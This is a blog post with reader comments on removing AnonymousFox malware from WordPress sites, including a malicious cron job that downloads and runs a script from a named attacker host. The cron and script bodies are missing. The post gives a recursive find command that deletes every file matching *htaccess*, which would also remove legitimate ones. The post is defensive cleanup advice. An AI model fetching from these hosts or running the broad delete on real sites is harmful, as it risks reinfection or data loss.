The AnonymousFox Hack guide by Sucuri misses a huge step in cleaning a hacked WordPress website, and that step is: removing the cronjobs
While removing AnonymousFox malware from a website I noticed the following cron:
It downloads a script from http://hello.hahaha666.xyz/xxxd and runs it, the script is:
It creates a new folder css and replaces the index.php file with http://hello.hahaha666.xyz/wp-class.txt
source code:
This file then modifies the default .htaccess and creates a .htaccess file inside every directory. These .htaccess files can be found by using the command:
grep -r "Deny from all" *
to remove all these .htaccess files:
find -type f -name '*htaccess*' -delete
As mentioned at the beginning of the post, checking and removing cronjobs is necessary when cleaning up hacked WordPress websites, and I hope that sucuri will eventually include it in their “fix FoxAuto WordPress malware” guide.
Hi, thanks for your blog!
May I know where to enter the commend grep -r “Deny from all” *?
Thanks in advance!
Hello,
the command is used from the terminal (SSH), if you are using cPanel, look for “Terminal” icon:
then enter the folder where your website is located, example:
cd public_html
wherecd
means enter andpublic_html
is the directory name.and use
grep -r "Deny from all" *
to find all .htaccess files that are blocking access:If you are not using cpanel or don’t see the “Terminal” icon, ask your hosting provider for SSH access.